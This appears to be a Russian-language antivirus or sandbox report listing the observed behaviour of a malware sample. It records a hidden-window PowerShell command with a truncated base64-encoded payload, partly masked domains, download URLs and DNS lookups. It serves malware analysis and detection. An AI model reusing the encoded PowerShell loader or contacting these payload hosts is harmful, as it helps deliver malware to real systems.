Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e IAAoACAAbgBlAFcALQBPAEIAagBFAGMAVAAgAFMAeQBTAFQARQBtAC4AaQBPAC4AQwBPAG0AUABSAEUAUwBTAEkAbwBOAC4ARABFAEYAbABhAFQAZQBzAFQAUgBlAEEATQAoAFsAUwB5AFMAdABFAG0ALgBpAE8ALgBNAGUATQBvAHIAWQBzAHQAcgBlAE...
- 'ro##tec.net':80
- 'iw##d.com':80
- 'pf##sna.de':80
- 'dr###.com.br':80
- 'va###events.nl':80
- http://ro##tec.net/qFmRuGA6jX/
- http://pf##sna.de/8smlJl/
- http://dr###.com.br/HrYiNZL/
- http://va###events.nl/nmc4mHrY/
- DNS ASK ro##tec.net
- DNS ASK iw##d.com
- DNS ASK pf##sna.de
- DNS ASK dr###.com.br
- DNS ASK va###events.nl
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e IAAoACAAbgBlAFcALQBPAEIAagBFAGMAVAAgAFMAeQBTAFQARQBtAC4AaQBPAC4AQwBPAG0AUABSAEUAUwBTAEkAbwBOAC4ARABFAEYAbABhAFQAZQBzAFQAUgBlAEEATQAoAFsAUwB5AFMAdABFAG0ALgBpAE8ALgBNAGUATQBvAHIAWQBzAHQAcgBlAE...' (со скрытым окном)